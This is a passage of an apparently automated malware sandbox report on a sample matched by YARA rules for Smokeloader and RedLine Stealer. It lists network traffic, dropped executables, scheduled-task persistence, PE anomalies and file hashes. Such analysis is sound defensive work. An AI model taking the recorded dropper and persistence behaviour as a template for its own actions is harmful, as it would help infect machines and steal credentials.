Source: unknown	Network traffic detected: HTTP traffic on port 61190 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61248
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61402
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61249
Source: unknown	Network traffic detected: HTTP traffic on port 61258 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61524
Source: unknown	Network traffic detected: HTTP traffic on port 56346 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 61348 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61242
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61243
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61244
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61245
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61366
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61488
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61247
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61401
Source: unknown	Network traffic detected: HTTP traffic on port 61244 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 61202 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 61357 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 56210 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 55895 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 55894
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 56345
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 55895
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 56346
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61259
Source: unknown	Network traffic detected: HTTP traffic on port 61343 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 61283 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61416
Source: unknown	Network traffic detected: HTTP traffic on port 61230 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 61337 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 55994 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 61255 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61253
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61255
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61256
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61257
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61258
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61391
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61271
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61392
Source: unknown	Network traffic detected: HTTP traffic on port 61432 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 61289 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 61243 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 61323 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 55875 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 55791
Source: unknown	Network traffic detected: HTTP traffic on port 61449 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 55792
Source: unknown	Network traffic detected: HTTP traffic on port 55792 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61302
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61283
Source: unknown	Network traffic detected: HTTP traffic on port 55993 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 61366 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61319
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61274
Source: unknown	Network traffic detected: HTTP traffic on port 61349 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61430
Source: unknown	Network traffic detected: HTTP traffic on port 61257 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61311
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61432
Source: unknown	Network traffic detected: HTTP traffic on port 61295 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 61331 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 61463 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 61245 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61293
Source: unknown	Network traffic detected: HTTP traffic on port 61325 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 61302 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 61430 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61204
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61325
Source: unknown	Network traffic detected: HTTP traffic on port 61401 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61448
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61449
Source: unknown	Network traffic detected: HTTP traffic on port 61212 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 61231 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 61319 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 61311 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 61460 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61289
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61202
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61323
Source: unknown	Network traffic detected: HTTP traffic on port 61223 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 61248 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 61259 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 61392 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61337
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61217
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61459
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61218
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61295
Source: unknown	Network traffic detected: HTTP traffic on port 61217 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 61350 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61330
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61451
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61331
Source: unknown	Network traffic detected: HTTP traffic on port 61293 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61299
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61212

Source: unknown	HTTPS traffic detected: 104.21.72.79:443 -> 192.168.2.5:61271 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.72.79:443 -> 192.168.2.5:61274 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.72.79:443 -> 192.168.2.5:61283 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.72.79:443 -> 192.168.2.5:61289 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.72.79:443 -> 192.168.2.5:61293 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.72.79:443 -> 192.168.2.5:61295 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.72.79:443 -> 192.168.2.5:61299 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.72.79:443 -> 192.168.2.5:61302 version: TLS 1.2

Drops certificate files (DER)

Source: C:\Users\user\AppData\Local\Temp\1000027001\buildred.exe	File created: C:\Users\user\AppData\Local\Temp\Tmp7452.tmp			Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1000027001\buildred.exe	File created: C:\Users\user\AppData\Local\Temp\Tmp73F3.tmp			Jump to dropped file

System Summary

Malicious sample detected (through community Yara rule)

Source: 00000000.00000002.2419937353.0000000002600000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
Source: 00000000.00000002.2420085269.00000000026BD000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 0000002E.00000002.2853783541.00000000026E0000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 00000016.00000002.2778148129.00000000027BD000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 00000016.00000002.2769315427.00000000026F0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
Source: 0000002E.00000002.2853503959.00000000026A0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown

PE file contains section with special chars

Source: random[1].exe.0.dr	Static PE information: section name:
Source: random[1].exe.0.dr	Static PE information: section name: .idata
Source: random[1].exe.0.dr	Static PE information: section name:
Source: RoamingBKKFHIEGDH.exe.0.dr	Static PE information: section name:
Source: RoamingBKKFHIEGDH.exe.0.dr	Static PE information: section name: .idata
Source: RoamingBKKFHIEGDH.exe.0.dr	Static PE information: section name:
Source: enter[1].exe.0.dr	Static PE information: section name:
Source: enter[1].exe.0.dr	Static PE information: section name: .idata
Source: enter[1].exe.0.dr	Static PE information: section name:
Source: RoamingAEGIJKEHCA.exe.0.dr	Static PE information: section name:
Source: RoamingAEGIJKEHCA.exe.0.dr	Static PE information: section name: .idata
Source: RoamingAEGIJKEHCA.exe.0.dr	Static PE information: section name:
Source: axplong.exe.5.dr	Static PE information: section name:
Source: axplong.exe.5.dr	Static PE information: section name: .idata
Source: axplong.exe.5.dr	Static PE information: section name:
Source: explorti.exe.8.dr	Static PE information: section name:
Source: explorti.exe.8.dr	Static PE information: section name: .idata
Source: explorti.exe.8.dr	Static PE information: section name:

Contains functionality to call native functions

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C73B700 NtQueryVirtualMemory,RtlNtStatusToDosError,RtlSetLastWin32Error,	0_2_6C73B700
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C73B8C0 rand_s,NtQueryVirtualMemory,	0_2_6C73B8C0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C73B910 rand_s,NtQueryVirtualMemory,NtQueryVirtualMemory,RtlNtStatusToDosError,RtlSetLastWin32Error,GetLastError,	0_2_6C73B910
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6DF280 NtQueryVirtualMemory,GetProcAddress,NtQueryVirtualMemory,RtlNtStatusToDosError,RtlSetLastWin32Error,	0_2_6C6DF280

Creates files inside the system directory

Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	File created: C:\Windows\Tasks\axplong.job	Jump to behavior
Source: C:\Users\user\AppData\RoamingAEGIJKEHCA.exe	File created: C:\Windows\Tasks\explorti.job	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000025001\PharmaciesDetection.exe	File created: C:\Windows\TrainsSexcam
Source: C:\Users\user\AppData\Local\Temp\1000025001\PharmaciesDetection.exe	File created: C:\Windows\GamingNat
Source: C:\Users\user\AppData\Local\Temp\1000025001\PharmaciesDetection.exe	File created: C:\Windows\PermitLite
Source: C:\Users\user\AppData\Local\Temp\1000025001\PharmaciesDetection.exe	File created: C:\Windows\JennyArtistic
Source: C:\Users\user\AppData\Local\Temp\1000025001\PharmaciesDetection.exe	File created: C:\Windows\PolyphonicWeblog
Source: C:\Users\user\AppData\Local\Temp\1000025001\PharmaciesDetection.exe	File created: C:\Windows\SgLaid
Source: C:\Users\user\AppData\Local\Temp\1000025001\PharmaciesDetection.exe	File created: C:\Windows\FacingLone
Source: C:\Users\user\AppData\Local\Temp\1000025001\PharmaciesDetection.exe	File created: C:\Windows\GeniusRepeat
Source: C:\Users\user\AppData\Local\Temp\1000025001\PharmaciesDetection.exe	File created: C:\Windows\EditedRights
Source: C:\Users\user\AppData\Local\Temp\1000025001\PharmaciesDetection.exe	File created: C:\Windows\XiMilton
Source: C:\Users\user\AppData\Local\Temp\1000025001\PharmaciesDetection.exe	File created: C:\Windows\MissWheat

Detected potential crypto function

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6D35A0	0_2_6C6D35A0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C74545C	0_2_6C74545C
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6E5440	0_2_6C6E5440
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C74542B	0_2_6C74542B
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C715C10	0_2_6C715C10
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C722C10	0_2_6C722C10
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C74AC00	0_2_6C74AC00
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C716CF0	0_2_6C716CF0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6DD4E0	0_2_6C6DD4E0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6E64C0	0_2_6C6E64C0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6FD4D0	0_2_6C6FD4D0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C7334A0	0_2_6C7334A0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C73C4A0	0_2_6C73C4A0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6E6C80	0_2_6C6E6C80
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C700512	0_2_6C700512
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6EFD00	0_2_6C6EFD00
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6FED10	0_2_6C6FED10
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C7385F0	0_2_6C7385F0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C710DD0	0_2_6C710DD0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C746E63	0_2_6C746E63
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6DC670	0_2_6C6DC670
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C713E50	0_2_6C713E50
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6F4640	0_2_6C6F4640
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C722E4E	0_2_6C722E4E
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6F9E50	0_2_6C6F9E50
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C739E30	0_2_6C739E30
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C717E10	0_2_6C717E10
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C725600	0_2_6C725600
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C7476E3	0_2_6C7476E3
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6DBEF0	0_2_6C6DBEF0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6EFEF0	0_2_6C6EFEF0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C734EA0	0_2_6C734EA0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C73E680	0_2_6C73E680
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6F5E90	0_2_6C6F5E90
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C717710	0_2_6C717710
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6E9F00	0_2_6C6E9F00
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C706FF0	0_2_6C706FF0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6DDFE0	0_2_6C6DDFE0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C7277A0	0_2_6C7277A0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C71F070	0_2_6C71F070
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6F8850	0_2_6C6F8850
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6FD850	0_2_6C6FD850
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C71B820	0_2_6C71B820
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C724820	0_2_6C724820
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6E7810	0_2_6C6E7810
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6FC0E0	0_2_6C6FC0E0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C7158E0	0_2_6C7158E0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C7450C7	0_2_6C7450C7
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C7060A0	0_2_6C7060A0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C72B970	0_2_6C72B970
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C74B170	0_2_6C74B170
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6ED960	0_2_6C6ED960
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6FA940	0_2_6C6FA940
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C70D9B0	0_2_6C70D9B0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6DC9A0	0_2_6C6DC9A0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C715190	0_2_6C715190
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C732990	0_2_6C732990
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C719A60	0_2_6C719A60
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C71E2F0	0_2_6C71E2F0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6F1AF0	0_2_6C6F1AF0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C718AC0	0_2_6C718AC0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C742AB0	0_2_6C742AB0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6D22A0	0_2_6C6D22A0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C704AA0	0_2_6C704AA0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6ECAB0	0_2_6C6ECAB0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C74BA90	0_2_6C74BA90
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6EC370	0_2_6C6EC370
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6D5340	0_2_6C6D5340
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C71D320	0_2_6C71D320
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C7453C8	0_2_6C7453C8
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6DF380	0_2_6C6DF380
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C78AC60	0_2_6C78AC60
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C846C00	0_2_6C846C00
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C7DECD0	0_2_6C7DECD0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C85AC30	0_2_6C85AC30
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C77ECC0	0_2_6C77ECC0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C816D90	0_2_6C816D90
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C90CDC0	0_2_6C90CDC0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C908D20	0_2_6C908D20
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C784DB0	0_2_6C784DB0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C8AAD50	0_2_6C8AAD50
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C84ED70	0_2_6C84ED70
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C806E90	0_2_6C806E90
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C820EC0	0_2_6C820EC0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C860E20	0_2_6C860E20
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C78AEC0	0_2_6C78AEC0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C81EE70	0_2_6C81EE70
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C8C8FB0	0_2_6C8C8FB0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C7EEF40	0_2_6C7EEF40
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C786F10	0_2_6C786F10
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C85EFF0	0_2_6C85EFF0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C780FE0	0_2_6C780FE0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C8C0F20	0_2_6C8C0F20
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C78EFB0	0_2_6C78EFB0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C842F70	0_2_6C842F70
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C7D0820	0_2_6C7D0820
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C8868E0	0_2_6C8868E0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C80A820	0_2_6C80A820
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C854840	0_2_6C854840
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C7B8960	0_2_6C7B8960
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C8109A0	0_2_6C8109A0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C83A9A0	0_2_6C83A9A0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C8409B0	0_2_6C8409B0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C89C9E0	0_2_6C89C9E0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C7D6900	0_2_6C7D6900
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C7B49F0	0_2_6C7B49F0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C7FCA70	0_2_6C7FCA70
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C82EA00	0_2_6C82EA00
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C838A30	0_2_6C838A30
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C7FEA80	0_2_6C7FEA80
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C820BA0	0_2_6C820BA0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C886BE0	0_2_6C886BE0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C8AA480	0_2_6C8AA480
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C798460	0_2_6C798460
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C81A4D0	0_2_6C81A4D0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C7E4420	0_2_6C7E4420
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C7C64D0	0_2_6C7C64D0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C80A430	0_2_6C80A430
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C7E2560	0_2_6C7E2560
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C7D8540	0_2_6C7D8540
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C84A5E0	0_2_6C84A5E0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C80E5F0	0_2_6C80E5F0

Dropped file seen in connection with other malware

Source: Joe Sandbox View	Dropped File: C:\ProgramData\freebl3.dll EDD043F2005DBD5902FC421EABB9472A7266950C5CBACA34E2D590B17D12F5FA
Source: Joe Sandbox View	Dropped File: C:\ProgramData\mozglue.dll BA06A6EE0B15F5BE5C4E67782EEC8B521E36C107A329093EC400FE0404EB196A

Found potential string decryption / allocating functions

Source: C:\Users\user\Desktop\file.exe	Code function: String function: 6C9009D0 appears 137 times
Source: C:\Users\user\Desktop\file.exe	Code function: String function: 00404610 appears 316 times
Source: C:\Users\user\Desktop\file.exe	Code function: String function: 6C7A3620 appears 35 times
Source: C:\Users\user\Desktop\file.exe	Code function: String function: 6C90DAE0 appears 33 times
Source: C:\Users\user\Desktop\file.exe	Code function: String function: 6C7194D0 appears 90 times
Source: C:\Users\user\Desktop\file.exe	Code function: String function: 6C70CBE8 appears 134 times

One or more processes crash

Source: C:\Users\user\Desktop\file.exe

Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 616 -s 2504

PE file contains more sections than normal

Source: build2[1].exe.20.dr	Static PE information: Number of sections : 11 > 10
Source: build2.exe.20.dr	Static PE information: Number of sections : 11 > 10

Sample file is different than original file name gathered from version info

Source: file.exe, 00000000.00000002.2435800238.0000000028D6A000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameCmd.Exe.MUIj% vs file.exe
Source: file.exe, 00000000.00000002.2435800238.0000000028D6A000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameCmd.Exej% vs file.exe
Source: file.exe, 00000000.00000002.2442015569.000000006C955000.00000002.00000001.01000000.00000007.sdmp	Binary or memory string: OriginalFilenamenss3.dll0 vs file.exe
Source: file.exe, 00000000.00000000.2003380792.000000000244C000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenamesOdilesigo@ vs file.exe
Source: file.exe, 00000000.00000002.2441684437.000000006C762000.00000002.00000001.01000000.00000008.sdmp	Binary or memory string: OriginalFilenamemozglue.dll0 vs file.exe
Source: file.exe	Binary or memory string: OriginalFilenamesOdilesigo@ vs file.exe

Uses 32bit PE files

Source: file.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE

Yara signature match

Source: 00000000.00000002.2419937353.0000000002600000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
Source: 00000000.00000002.2420085269.00000000026BD000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 0000002E.00000002.2853783541.00000000026E0000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 00000016.00000002.2778148129.00000000027BD000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 00000016.00000002.2769315427.00000000026F0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
Source: 0000002E.00000002.2853503959.00000000026A0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23

Source: file.exe	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: random[1].exe.19.dr	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
